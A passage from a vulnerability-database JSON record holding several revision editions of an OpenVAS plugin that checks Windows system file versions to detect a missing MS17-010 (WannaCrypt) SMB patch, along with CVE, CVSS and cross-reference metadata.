["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-06-05T17:22:59", "rev": 2, "value": 8.1, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-05 10:05:11 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 2003 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows 8 x86/x64\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows Server 2012\n\n - Microsoft Windows Server 2016\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012 R2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nvistVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n\n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 9, "lastseen": "2020-06-05T17:22:59"}, {"bulletin": {"id": "OPENVAS:1361412562310810810", "hash": "3c8a198e6ef21cb8cce62b81673e752a5a10f07a825b00d11a3178fa4d966c82", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2019-12-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-01-08T13:43:59", "history": [], "viewCount": 2565, "enchantments": {"dependencies": {"modified": "2020-01-08T13:43:59", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-01-08T13:43:59", "rev": 2, "value": 8.0, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows 8 x86/x64\n\n - Microsoft Windows 10 x32/x64 Edition\n\n - Microsoft Windows Server 2012 Edition\n\n - Microsoft Windows Server 2016\n\n - Microsoft Windows 8.1 x32/x64 Edition\n\n - Microsoft Windows Server 2012 R2 Edition\n\n - Microsoft Windows 7 x32/x64 Edition Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nvistVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n\n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 8, "lastseen": "2020-01-08T13:43:59"}, {"bulletin": {"id": "OPENVAS:1361412562310810810", "hash": "60156663e73c7addaf6150e860b5a110684c2390a2cabe3fbb54677f875833f8", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2018-10-11T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2018-10-11T12:33:57", "history": [], "viewCount": 50, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms17-010.nasl 11835 2018-10-11 08:38:49Z mmartin $\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"$Revision: 11835 $\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-11 10:38:49 +0200 (Thu, 11 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n Microsoft Windows XP SP2 x64\n\n Microsoft Windows XP SP3 x86\n\n Microsoft Windows 8 x86/x64\n\n Microsoft Windows 10 x32/x64 Edition\n\n Microsoft Windows Server 2012 Edition\n\n Microsoft Windows Server 2016\n\n Microsoft Windows 8.1 x32/x64 Edition\n\n Microsoft Windows Server 2012 R2 Edition\n\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, 